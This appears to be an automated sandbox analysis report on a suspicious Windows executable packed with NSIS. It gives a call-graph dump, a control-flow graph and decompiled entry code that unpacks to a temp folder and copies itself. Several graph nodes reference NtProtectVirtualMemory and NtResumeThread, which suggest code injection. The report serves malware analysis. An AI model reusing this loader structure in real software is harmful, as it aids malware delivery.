8342 404402 8341->8342 8342->8300 8343 40440a ShowWindow 8342->8343 8344 4044e5 SendMessageW 8343->8344 8344->8345 8345->8300 8345->8305 8347 40657a 17 API calls 8346->8347 8348 4044a4 SetDlgItemTextW 8347->8348 8348->8321 8349->8325 8350->8330 8351->8332 8353 404479 8352->8353 8354 40447f SendMessageW 8352->8354 8353->8354 8354->8311 8356 4045c3 8355->8356 8357 404518 GetWindowLongW 8355->8357 8356->8300 8357->8356 8358 40452d 8357->8358 8358->8356 8359 40455a GetSysColor 8358->8359 8360 40455d 8358->8360 8359->8360 8361 404563 SetTextColor 8360->8361 8362 40456d SetBkMode 8360->8362 8361->8362 8363 404585 GetSysColor 8362->8363 8364 40458b 8362->8364 8363->8364 8365 404592 SetBkColor 8364->8365 8366 40459c 8364->8366 8365->8366 8366->8356 8367 4045b6 CreateBrushIndirect 8366->8367 8368 4045af DeleteObject 8366->8368 8367->8356 8368->8367 8970 2f48e2e 8971 2f48e45 8970->8971 8972 2f48ebc 8971->8972 8973 2f48edb 8971->8973 8974 2f48ee8 8972->8974 8976 2f4a20e 5 API calls 8972->8976 8973->8974 8975 2f4a20e 5 API calls 8973->8975 8975->8974 8976->8974 9535 401b9b 9536 401ba8 9535->9536 9537 401bec 9535->9537 9538 401c31 9536->9538 9543 401bbf 9536->9543 9539 401bf1 9537->9539 9540 401c16 GlobalAlloc 9537->9540 9542 40657a 17 API calls 9538->9542 9548 40239d 9538->9548 9539->9548 9556 40653d lstrcpynW 9539->9556 9541 40657a 17 API calls 9540->9541 9541->9538 9544 402397 9542->9544 9554 40653d lstrcpynW 9543->9554 9544->9548 9549 405b9d MessageBoxIndirectW 9544->9549 9547 401c03 GlobalFree 9547->9548 9549->9548 9550 401bce 9555 40653d lstrcpynW 9550->9555 9552 401bdd 9557 40653d lstrcpynW 9552->9557 9554->9550 9555->9552 9556->9547 9557->9548 8392 40259e 8393 402de6 17 API calls 8392->8393 8394 4025a8 8393->8394 8395 402d84 17 API calls 8394->8395 8396 4025b1 8395->8396 8397 4025d9 RegEnumValueW 8396->8397 8398 4025cd RegEnumKeyW 8396->8398 8401 40292e 8396->8401 8399 4025f5 RegCloseKey 8397->8399 8400 4025ee 8397->8400 8398->8399 8399->8401 8400->8399 8977 40149e 8978 4014ac PostQuitMessage 8977->8978 8979 40239d 8977->8979 8978->8979 9562 710310e1 9572 71031111 9562->9572 9563 710312b0 GlobalFree 9564 71031240 GlobalFree 9564->9572 9565 710311d7 GlobalAlloc 9565->9572 9566 710312ab 9566->9563 9567 7103135a 2 API calls 9567->9572 9568 7103129a GlobalFree 9568->9572 9569 71031312 2 API calls 9569->9572 9570 7103116b GlobalAlloc 9570->9572 9571 71031381 lstrcpyW 9571->9572 9572->9563 9572->9564 9572->9565 9572->9566 9572->9567 9572->9568 9572->9569 9572->9570 9572->9571 9573 4015a3 9574 402da6 17 API calls 9573->9574 9575 4015aa SetFileAttributesW 9574->9575 9576 4015bc 9575->9576 9577 401fa4 9578 402da6 17 API calls 9577->9578 9579 401faa 9578->9579 9580 40559f 24 API calls 9579->9580 9581 401fb4 9580->9581 9582 405b20 2 API calls 9581->9582 9583 401fba 9582->9583 9584 401fdd CloseHandle 9583->9584 9585 4069b5 5 API calls 9583->9585 9588 40292e 9583->9588 9584->9588 9587 401fcf 9585->9587 9587->9584 9590 406484 wsprintfW 9587->9590 9590->9584 8980 2f4d811 GetPEB 8981 2f46986 8980->8981 8982 2f4ac12 8983 2f55355 5 API calls 8982->8983 8984 2f4ac37 8983->8984 8987 2f4ada1 8984->8987 8986 2f4ad9d 8988 2f4ae4f 8987->8988 8989 2f57709 NtResumeThread 8988->8989 8990 2f4af9a 8989->8990 8991 2f57709 NtResumeThread 8990->8991 8992 2f46986 8990->8992 8993 2f4b17f 8990->8993 8991->8993 8992->8986 8993->8992 8994 2f57709 NtResumeThread 8993->8994 8994->8992 8995 710323e9 8996 71032453 8995->8996 8997 7103245e GlobalAlloc 8996->8997 8998 7103247d 8996->8998 8997->8996 9591 4021aa 9592 402da6 17 API calls 9591->9592 9593 4021b1 9592->9593 9594 402da6 17 API calls 9593->9594 9595 4021bb 9594->9595 9596 402da6 17 API calls 9595->9596 9597 4021c5 9596->9597 9598 402da6 17 API calls 9597->9598 9599 4021cf 9598->9599 9600 402da6 17 API calls 9599->9600 9601 4021d9 9600->9601 9602 402218 CoCreateInstance 9601->9602 9603 402da6 17 API calls 9601->9603 9606 402237 9602->9606 9603->9602 9604 401423 24 API calls 9605 4022f6 9604->9605 9606->9604 9606->9605 9607 403baa 9608 403bb5 9607->9608 9609 403bb9 9608->9609 9610 403bbc GlobalAlloc 9608->9610 9610->9609 9611 2f49d05 9612 2f49d53 9611->9612 9613 2f57709 NtResumeThread 9612->9613 9614 2f49d78 9613->9614 8065 4023b2 8066 4023ba 8065->8066 8069 4023c0 8065->8069 8067 402da6 17 API calls 8066->8067 8067->8069 8068 4023ce 8071 4023dc 8068->8071 8072 402da6 17 API calls 8068->8072 8069->8068 8070 402da6 17 API calls 8069->8070 8070->8068 8073 402da6 17 API calls 8071->8073 8072->8071 8074 4023e5 WritePrivateProfileStringW 8073->8074 9013 4014b8 9014 4014be 9013->9014 9015 401389 2 API calls 9014->9015 9016 4014c6 9015->9016 9619 2f4750d 9620 2f47524 9619->9620 9621 2f547be 5 API calls 9620->9621 9622 2f4755b 9621->9622 9623 2f547be 5 API calls 9622->9623 9624 2f47578 9623->9624 9627 2f47615 9624->9627 9626 2f475b1 9629 2f475df 9627->9629 9628 2f56fc6 NtProtectVirtualMemory 9628->9629 9629->9627 9629->9628 9629->9629 9630 2f478b6 9629->9630 9630->9626

                                                                                      Executed Functions

                                                                                      Function 0040352D Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 450stringfilecomCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 26 40365c 21->26 26->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 39 403702-403706 35->39 40 4036fd-403701 35->40 36->35 36->36 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->44 45 40386a-403882 DeleteFileW call 40307d 37->45 42 4037c6-4037d4 call 405e39 39->42 43 40370c-403712 39->43 40->39 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 54 403722 47->54 55 40371d-403720 47->55 49 403781-4037bb 48->49 50 403767-40376c 48->50 58 4037c3-4037c5 49->58 59 4037bd-4037c1 49->59 50->49 56 40376e-403776 50->56 54->48 55->48 55->54 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->49 62->63 63->49 64->45 64->67 65->37 70 403894-4038a7 call 405e39 66->70 71 403935-40393c call 403bec 66->71 78 403a69-403a78 call 405b9d ExitProcess 67->78 79 403a7e-403a84 67->79 81 4038f9-403906 70->81 82 4038a9-4038de 70->82 77 403941-403944 71->77 77->67 84 403a86-403a9b GetCurrentProcess OpenProcessToken 79->84 85 403afc-403b04 79->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 94 4038e6-4038eb 86->94 95 4038ed-4038f5 86->95 87->88 89->67 105 40391c-403932 call 40653d * 2 89->105 103 40396a-403984 lstrcatW lstrcmpiW 90->103 104 40395f-403965 lstrcatW 90->104 106 403ae8-403af3 ExitWindowsEx 92->106 107 403adc-403ae6 92->107 93->92 94->95 99 4038f7 94->99 95->86 95->99 99->81 109 403a57 103->109 110 40398a-40398d 103->110 104->103 105->71 106->85 108 403af5-403af7 call 40140b 106->108 107->106 107->108 108->85 109->67 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 121 40399b-4039ab SetCurrentDirectoryW 114->121 115->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 134 403a50-403a52 call 4062fd 131->134 132->131 133 403a18-403a38 call 4062fd call 40657a call 405b20 132->133 133->131 142 403a3a-403a41 CloseHandle 133->142 134->109 142->131
                                                                                      C-Code - Quality: 79%
                                                                                      			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				short _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x441800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", 0x441800);
														}
														E0040653D(L"ppingA", _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Borders.dat" = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Borders.dat" =  &(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Borders.dat"[0]);
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E0040653D(0x441000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                                      0x0040353b
                                                                                      0x0040353c
                                                                                      0x00403543
                                                                                      0x00403546
                                                                                      0x0040354d
                                                                                      0x00403550
                                                                                      0x00403563
                                                                                      0x00403569
                                                                                      0x0040356c
                                                                                      0x0040356f
                                                                                      0x0040357d
                                                                                      0x00403585
                                                                                      0x00403590
                                                                                      0x004035a9
                                                                                      0x004035ab
                                                                                      0x004035b3
                                                                                      0x004035b3
                                                                                      0x004035be
                                                                                      0x004035c0
                                                                                      0x004035c0
                                                                                      0x004035d5
                                                                                      0x004035fa
                                                                                      0x00403608
                                                                                      0x0040360b
                                                                                      0x00403612
                                                                                      0x00403619
                                                                                      0x00403619
                                                                                      0x00403612
                                                                                      0x0040361b
                                                                                      0x00403620
                                                                                      0x00403621
                                                                                      0x0040362d
                                                                                      0x00403631
                                                                                      0x00403638
                                                                                      0x00403646
                                                                                      0x0040364b
                                                                                      0x00403652
                                                                                      0x00403656
                                                                                      0x0040365a
                                                                                      0x0040365c
                                                                                      0x0040365c
                                                                                      0x0040365a
                                                                                      0x00403663
                                                                                      0x0040366a
                                                                                      0x00403670
                                                                                      0x00403688
                                                                                      0x00403698
                                                                                      0x0040369d
                                                                                      0x004036a3
                                                                                      0x004036aa
                                                                                      0x004036b1
                                                                                      0x004036b3
                                                                                      0x004036b4
                                                                                      0x004036be
                                                                                      0x004036c5
                                                                                      0x004036c7
                                                                                      0x004036c9
                                                                                      0x004036c9
                                                                                      0x004036dc
                                                                                      0x004036de
                                                                                      0x004037d8
                                                                                      0x004037d8
                                                                                      0x004037db
                                                                                      0x004037de
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004036e8
                                                                                      0x004036e9
                                                                                      0x004036ec
                                                                                      0x004036f5
                                                                                      0x004036f5
                                                                                      0x004036f8
                                                                                      0x004036fb
                                                                                      0x004036fe
                                                                                      0x00403701
                                                                                      0x00403701
                                                                                      0x00403701
                                                                                      0x00403702
                                                                                      0x00403706
                                                                                      0x004037c6
                                                                                      0x004037cf
                                                                                      0x004037d1
                                                                                      0x004037d4
                                                                                      0x004037d7
                                                                                      0x004037d7
                                                                                      0x004037d7
                                                                                      0x00000000
                                                                                      0x0040370c
                                                                                      0x0040370d
                                                                                      0x0040370e
                                                                                      0x00403712
                                                                                      0x0040372c
                                                                                      0x00403733
                                                                                      0x00403746
                                                                                      0x00403747
                                                                                      0x0040375c
                                                                                      0x00403761
                                                                                      0x00403763
                                                                                      0x00403765
                                                                                      0x00403781
                                                                                      0x00403788
                                                                                      0x0040379b
                                                                                      0x0040379c
                                                                                      0x004037b1
                                                                                      0x004037b7
                                                                                      0x004037b9
                                                                                      0x004037bb
                                                                                      0x004037c3
                                                                                      0x004037c5
                                                                                      0x00000000
                                                                                      0x004037c5
                                                                                      0x004037bf
                                                                                      0x004037c1
                                                                                      0x004037e6
                                                                                      0x004037ea
                                                                                      0x004037f3
                                                                                      0x004037f8
                                                                                      0x004037fe
                                                                                      0x00403809
                                                                                      0x0040380b
                                                                                      0x00403810
                                                                                      0x00403812
                                                                                      0x0040386a
                                                                                      0x0040386f
                                                                                      0x00403878
                                                                                      0x0040387f
                                                                                      0x00403882
                                                                                      0x00403a59
                                                                                      0x00403a59
                                                                                      0x00403a5e
                                                                                      0x00403a67
                                                                                      0x00403a84
                                                                                      0x00403afc
                                                                                      0x00403afc
                                                                                      0x00403b04
                                                                                      0x00403b06
                                                                                      0x00403b06
                                                                                      0x00403b0c
                                                                                      0x00403b0c
                                                                                      0x00403a9b
                                                                                      0x00403aa7
                                                                                      0x00403ab8
                                                                                      0x00403abf
                                                                                      0x00403ac6
                                                                                      0x00403ac6
                                                                                      0x00403ace
                                                                                      0x00403ada
                                                                                      0x00403ae8
                                                                                      0x00403af3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403adc
                                                                                      0x00403adc
                                                                                      0x00403add
                                                                                      0x00403adf
                                                                                      0x00403ae0
                                                                                      0x00403ae1
                                                                                      0x00403ae6
                                                                                      0x00403af5
                                                                                      0x00403af7
                                                                                      0x00000000
                                                                                      0x00403af7
                                                                                      0x00000000
                                                                                      0x00403ae6
                                                                                      0x00403ada
                                                                                      0x00403a71
                                                                                      0x00403a78
                                                                                      0x00403a78
                                                                                      0x0040388e
                                                                                      0x00403935
                                                                                      0x00403935
                                                                                      0x00403941
                                                                                      0x00000000
                                                                                      0x00403941
                                                                                      0x0040389f
                                                                                      0x004038a7
                                                                                      0x004038f9
                                                                                      0x004038f9
                                                                                      0x004038ff
                                                                                      0x00403906
                                                                                      0x00403954
                                                                                      0x00403956
                                                                                      0x0040395b
                                                                                      0x0040395d
                                                                                      0x00403965
                                                                                      0x00403965
                                                                                      0x00403970
                                                                                      0x0040397c
                                                                                      0x00403982
                                                                                      0x00403984
                                                                                      0x00403a57
                                                                                      0x00403a57
                                                                                      0x00403a57
                                                                                      0x00000000
                                                                                      0x0040398a
                                                                                      0x0040398a
                                                                                      0x0040398c
                                                                                      0x0040398d
                                                                                      0x00403996
                                                                                      0x0040398f
                                                                                      0x0040398f
                                                                                      0x0040398f
                                                                                      0x0040399c
                                                                                      0x004039a4
                                                                                      0x004039ab
                                                                                      0x004039b3
                                                                                      0x004039b3
                                                                                      0x004039c0
                                                                                      0x004039cc
                                                                                      0x004039d6
                                                                                      0x004039d6
                                                                                      0x004039d8
                                                                                      0x004039df
                                                                                      0x004039e9
                                                                                      0x004039f5
                                                                                      0x004039fb
                                                                                      0x00403a01
                                                                                      0x00403a04
                                                                                      0x00403a0e
                                                                                      0x00403a14
                                                                                      0x00403a16
                                                                                      0x00403a1a
                                                                                      0x00403a2b
                                                                                      0x00403a31
                                                                                      0x00403a36
                                                                                      0x00403a38
                                                                                      0x00403a3b
                                                                                      0x00403a41
                                                                                      0x00403a41
                                                                                      0x00403a38
                                                                                      0x00403a16
                                                                                      0x00403a44
                                                                                      0x00403a4b
                                                                                      0x00403a4b
                                                                                      0x00403a4b
                                                                                      0x00403a4b
                                                                                      0x00403a52
                                                                                      0x00000000
                                                                                      0x00403a52
                                                                                      0x00403984
                                                                                      0x00403908
                                                                                      0x0040390b
                                                                                      0x0040390f
                                                                                      0x00403914
                                                                                      0x00403916
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403922
                                                                                      0x0040392d
                                                                                      0x00403932
                                                                                      0x00000000
                                                                                      0x00403932
                                                                                      0x004038b0
                                                                                      0x004038c8
                                                                                      0x004038d9
                                                                                      0x004038da
                                                                                      0x004038de
                                                                                      0x004038e0
                                                                                      0x004038ee
                                                                                      0x004038f5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004038f5
                                                                                      0x004038f7
                                                                                      0x00000000
                                                                                      0x004038f7
                                                                                      0x0040381a
                                                                                      0x00403826
                                                                                      0x0040382b
                                                                                      0x00403830
                                                                                      0x00403832
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040383a
                                                                                      0x00403842
                                                                                      0x00403853
                                                                                      0x0040385b
                                                                                      0x0040385d
                                                                                      0x00403862
                                                                                      0x00403864
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403864
                                                                                      0x00000000
                                                                                      0x004037c1
                                                                                      0x0040376a
                                                                                      0x0040376c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040376e
                                                                                      0x00403772
                                                                                      0x00403776
                                                                                      0x0040377d
                                                                                      0x0040377d
                                                                                      0x0040377d
                                                                                      0x0040377d
                                                                                      0x00000000
                                                                                      0x0040377d
                                                                                      0x00403778
                                                                                      0x0040377b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040377b
                                                                                      0x00403714
                                                                                      0x00403718
                                                                                      0x0040371b
                                                                                      0x00403722
                                                                                      0x00403722
                                                                                      0x00000000
                                                                                      0x00403722
                                                                                      0x0040371d
                                                                                      0x00403720
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403720
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004036ee
                                                                                      0x004036ee
                                                                                      0x004036ef
                                                                                      0x004036f0
                                                                                      0x004036f0
                                                                                      0x00000000
                                                                                      0x004036ee
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                      • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                      • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                      • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                      • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
